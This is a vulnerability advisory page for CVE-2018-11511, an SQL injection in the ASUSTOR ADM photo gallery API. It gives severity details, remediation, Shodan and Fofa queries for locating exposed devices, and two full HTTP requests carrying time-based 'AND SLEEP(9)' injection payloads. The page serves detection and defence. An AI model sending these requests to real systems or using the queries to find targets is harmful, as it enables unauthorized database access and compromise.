🔙 목록으로 돌아가기

CVE-2018-11511: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection

TitleASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
Authorritikchaddha
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire ASUSTOR ADM system and accessing stored data.
RemediationUpgrade to a patched version of ASUSTOR ADM or apply vendor-provided security updates.
CVSS Score9.8
EPSS Score0.14317
CVE IDCVE-2018-11511
CWE IDCWE-89
Shodan Queryhttp.html:"ASUSTOR"
Fofa Querybody="ASUSTOR" && icon_hash="1678170702"
Tags cve cve2018 asustor adm sqli vkev vuln

🔍 Vulnerability Description

ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.

🌐 HTTP Request

POST /photo-gallery/api/album/tree_lists/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
POST /photo-gallery/api/photo/search/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-11511.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-11511.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A